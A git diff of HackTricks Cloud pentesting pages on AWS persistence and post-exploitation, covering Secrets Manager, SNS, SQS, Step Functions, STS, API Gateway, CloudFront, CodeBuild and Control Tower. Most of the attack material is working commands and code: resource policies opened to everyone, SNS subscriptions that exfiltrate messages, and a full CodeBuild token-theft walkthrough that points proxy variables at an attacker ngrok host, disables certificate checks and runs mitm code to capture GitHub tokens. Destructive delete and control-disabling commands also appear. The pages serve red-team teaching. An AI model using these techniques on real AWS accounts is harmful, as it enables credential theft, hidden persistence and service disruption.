@@ -0,0 +1,53 @@ +# AWS - Secrets Manager Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Secrets Manager + +For more info check: + +{{#ref}} +../aws-services/aws-secrets-manager-enum.md +{{#endref}} + +### Via Resource Policies + +It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. + +### Via Secrets Rotate Lambda + +To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. + +This is how lambda code for such action could look like: + +```python +import boto3 + +def rotate_secrets(event, context): + # Create a Secrets Manager client + client = boto3.client('secretsmanager') + + # Retrieve the current secret value + secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] + + # Rotate the secret by updating its value + new_secret_value = rotate_secret(secret_value) + client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) + +def rotate_secret(secret_value): + # Perform the rotation logic here, e.g., generate a new password + + # Example: Generate a new password + new_secret_value = generate_password() + + return new_secret_value + +def generate_password(): + # Example: Generate a random password using the secrets module + import secrets + import string + password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) + return password +``` + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
new file mode 100644
index 000000000..fc0a2bced
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
@@ -0,0 +1,81 @@ +# AWS - SNS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## SNS + +For more information check: + +{{#ref}} +../aws-services/aws-sns-enum.md +{{#endref}} + +### Persistence + +When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ +The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: + +```json +{ + "Version": "2008-10-17", + "Id": "__default_policy_ID", + "Statement": [ + { + "Sid": "__default_statement_ID", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "SNS:Publish", + "SNS:RemovePermission", + "SNS:SetTopicAttributes", + "SNS:DeleteTopic", + "SNS:ListSubscriptionsByTopic", + "SNS:GetTopicAttributes", + "SNS:AddPermission", + "SNS:Subscribe" + ], + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", + "Condition": { + "StringEquals": { + "AWS:SourceOwner": "318142138553" + } + } + }, + { + "Sid": "__console_pub_0", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "SNS:Publish", + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" + }, + { + "Sid": "__console_sub_0", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "SNS:Subscribe", + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" + } + ] +} +``` + +### Create Subscribers + +To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. + +Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. + +```bash +aws sns subscribe --region \ + --protocol http \ + --notification-endpoint http:/// \ + --topic-arn +``` + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md new file mode 100644 index 000000000..50076c346 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md @@ -0,0 +1,39 @@ +# AWS - SQS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## SQS + +For more information check: + +{{#ref}} +../aws-services/aws-sqs-and-sns-enum.md +{{#endref}} + +### Using resource policy + +In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ +The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: + +```json +{ + "Version": "2008-10-17", + "Id": "__default_policy_ID", + "Statement": [ + { + "Sid": "__owner_statement", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": ["SQS:*"], + "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" + } + ] +} +``` + +> [!NOTE] +> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md similarity index 100% rename from pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md new file mode 100644 index 000000000..b86077b38 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md @@ -0,0 +1,21 @@ +# AWS - Step Functions Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Step Functions + +For more information check: + +{{#ref}} +../aws-services/aws-stepfunctions-enum.md +{{#endref}} + +### Step function Backdooring + +Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. + +### Backdooring aliases + +If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md similarity index 65% rename from pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md index 45549a99e..f95eb4b7e 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md @@ -1,27 +1,14 @@ # AWS - STS Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## STS For more information access: -{% content-ref url="../aws-services/aws-sts-enum.md" %} -[aws-sts-enum.md](../aws-services/aws-sts-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-sts-enum.md +{{#endref}} ### Assume role token @@ -54,9 +41,8 @@ optional arguments: -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...] ``` -{% hint style="danger" %} -Note that the [find\_circular\_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured. -{% endhint %} +> [!CAUTION] +> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
@@ -142,17 +128,4 @@ Write-Host "Role juggling check complete."
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md similarity index 100% rename from pentesting-cloud/aws-security/aws-post-exploitation/README.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/README.md diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md similarity index 66% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md index 405ff5e93..6eff1bc94 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - API Gateway Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## API Gateway For more information check: -{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} -[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-api-gateway-enum.md +{{#endref}} ### Access unexposed APIs 
@@ -36,22 +23,18 @@ As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloud Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`: -{% code overflow="wrap" %} ```yaml - RequestTemplates: - application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' +RequestTemplates: + application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' ``` -{% endcode %} However, sending a request with **`Content-type: text/json`** would prevent that filter. Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`: -{% code overflow="wrap" %} ```bash curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}' ``` -{% endcode %} ### Usage Plans DoS 
@@ -63,7 +46,6 @@ The **API Key** just need to be **included** inside a **HTTP header** called **` An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**. -{% code overflow="wrap" %} ```bash API_ID="your-api-id" RESPONSE_TYPE="DEFAULT_4XX" @@ -74,19 +56,16 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` -{% endcode %} **Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing ### `apigateway:UpdateStage`, `apigateway:CreateDeployment` An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**. -{% code overflow="wrap" %} ```bash API_ID="your-api-id" STAGE_NAME="Prod" @@ -97,13 +76,11 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` -{% endcode %} **Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing ### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment` 
@@ -124,9 +101,8 @@ aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod **Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing ### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment` @@ -144,9 +120,8 @@ aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod **Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing ### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey` @@ -165,21 +140,7 @@ aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_K **Potential Impact**: Unauthorized access to API resources, bypassing security controls. -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
new file mode 100644
index 000000000..ebcb510d5
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
@@ -0,0 +1,31 @@
+# AWS - CloudFront Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## CloudFront
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-cloudfront-enum.md
+{{#endref}}
+
+### Man-in-the-Middle
+
+This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
+
+#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
+
+- **Create** the malicious **function**.
+- **Associate** it with the CloudFront distribution.
+- Set the **event type to "Viewer Response"**.
+
+Accessing the response you could steal the users cookie and inject a malicious JS.
+
+#### scenario 2: MitM where CloudFront is already using a lambda function
+
+- **Modify the code** of the lambda function to steal sensitive information
+
+You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
new file mode 100644
index 000000000..913b55a5b
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
@@ -0,0 +1,84 @@
+# AWS - CodeBuild Post Exploitation
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## CodeBuild
+
+For more information, check:
+
+{{#ref}}
+../../aws-services/aws-codebuild-enum.md
+{{#endref}}
+
+### Check Secrets
+
+If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
+Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
+
+{{#ref}}
+../../aws-privilege-escalation/aws-secrets-manager-privesc.md
+{{#endref}}
+
+### Abuse CodeBuild Repo Access
+
+In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
+
+
+
+The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+
+An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
+In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+
+
+
+And **change the Buildspec commands to exfiltrate each repo**.
+
+> [!WARNING]
+> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
+> Or does he? Check the next section
+
+### Leaking Access Tokens from AWS CodeBuild
+
+You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
+
+```bash
+aws codebuild list-source-credentials
+```
+
+{{#ref}}
+aws-codebuild-token-leakage.md
+{{#endref}}
+
+### `codebuild:DeleteProject`
+
+An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
+
+```bash
+aws codebuild delete-project --name
+```
+
+**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
+
+### `codebuild:TagResource` , `codebuild:UntagResource`
+
+An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+
+```bash
+aws codebuild tag-resource --resource-arn --tags
+aws codebuild untag-resource --resource-arn --tag-keys
+```
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+
+### `codebuild:DeleteSourceCredentials`
+
+An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
+
+```sql
+aws codebuild delete-source-credentials --arn
+```
+
+**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
new file mode 100644
index 000000000..e433f04eb
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -0,0 +1,188 @@ +# AWS Codebuild - Token Leakage + +{{#include ../../../../banners/hacktricks-training.md}} + +## Recover Github/Bitbucket Configured Tokens + +First, check if there are any source credentials configured that you could leak: + +```bash +aws codebuild list-source-credentials +``` + +### Via Docker Image + +If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. + +For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. + +The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. + +1. **Create & Upload your own Docker MitM image** + - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. + - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. + - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host + - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) +2. **Set the environment** + - Create a **new Codebuild project** or **modify** the environment of an existing one. + - Set the project to use the **previously generated Docker image** + +
+
+3. **Set the MitM proxy in your host**
+
+- As indicated in the **Github repo** you could use something like:
+
+```bash
+mitmproxy --listen-port 4444 --allow-hosts "github.com"
+```
+
+> [!TIP]
+> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
+
+4. **Run the build & capture the credentials**
+
+- You can see the token in the **Authorization** header:
+
+
+ +This could also be done from the aws cli with something like + +```bash +# Create project using a Github connection +aws codebuild create-project --cli-input-json file:///tmp/buildspec.json + +## With /tmp/buildspec.json +{ + "name": "my-demo-project", + "source": { + "type": "GITHUB", + "location": "https://github.com/uname/repo", + "buildspec": "buildspec.yml" + }, + "artifacts": { + "type": "NO_ARTIFACTS" + }, + "environment": { + "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM + "image": "docker.io/carlospolop/docker-mitm:v12", + "computeType": "BUILD_GENERAL1_SMALL", + "imagePullCredentialsType": "CODEBUILD" + } +} + +## Json + +# Start the build +aws codebuild start-build --project-name my-project2 +``` + +### Via insecureSSL + +**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ +Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. + +- First you need to enumerate the current configuration with something like: + +```bash +aws codebuild batch-get-projects --name +``` + +- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). 
+ - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like: + +```bash +aws codebuild update-project --name \ + --source '{ + "type": "GITHUB", + "location": "https://github.com/carlospolop/404checker", + "gitCloneDepth": 1, + "gitSubmodulesConfig": { + "fetchSubmodules": false + }, + "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", + "auth": { + "type": "CODECONNECTIONS", + "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" + }, + "reportBuildStatus": false, + "insecureSsl": true + }' \ + --environment '{ + "type": "LINUX_CONTAINER", + "image": "aws/codebuild/standard:5.0", + "computeType": "BUILD_GENERAL1_SMALL", + "environmentVariables": [ + { + "name": "http_proxy", + "value": "http://2.tcp.eu.ngrok.io:15027" + }, + { + "name": "https_proxy", + "value": "http://2.tcp.eu.ngrok.io:15027" + } + ] + }' +``` + +- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) + +```python +from mitm import MITM, protocol, middleware, crypto + +mitm = MITM( + host="127.0.0.1", + port=4444, + protocols=[protocol.HTTP], + middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. + certificate_authority = crypto.CertificateAuthority() +) +mitm.run() +``` + +- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: + +
+
+### ~~Via HTTP protocol~~
+
+> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
+
+An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
+
+- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
+
+
+
+
+ +- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` +- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) + +```python +from mitm import MITM, protocol, middleware, crypto + +mitm = MITM( + host="0.0.0.0", + port=4444, + protocols=[protocol.HTTP], + middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. + certificate_authority = crypto.CertificateAuthority() +) +mitm.run() +``` + +- Next, click on **Build the project** or start the build from command line: + +```sh +aws codebuild start-build --project-name +``` + +- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port: + +
+
+> [!WARNING]
+> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
new file mode 100644
index 000000000..a37af9d5b
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
@@ -0,0 +1,20 @@
+# AWS - Control Tower Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Control Tower
+
+{{#ref}}
+../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
+{{#endref}}
+
+### Enable / Disable Controls
+
+To further exploit an account, you might need to disable/enable Control Tower controls:
+
+```bash
+aws controltower disable-control --control-identifier --target-identifier
+aws controltower enable-control --control-identifier --target-identifier
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
similarity index 56%
rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
index 0160899e9..af0db2d40 100644
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -1,19 +1,6 @@ # AWS - DLM Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Data Lifecycle Manger (DLM) @@ -105,17 +92,4 @@ A template for the policy document can be seen here: } ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
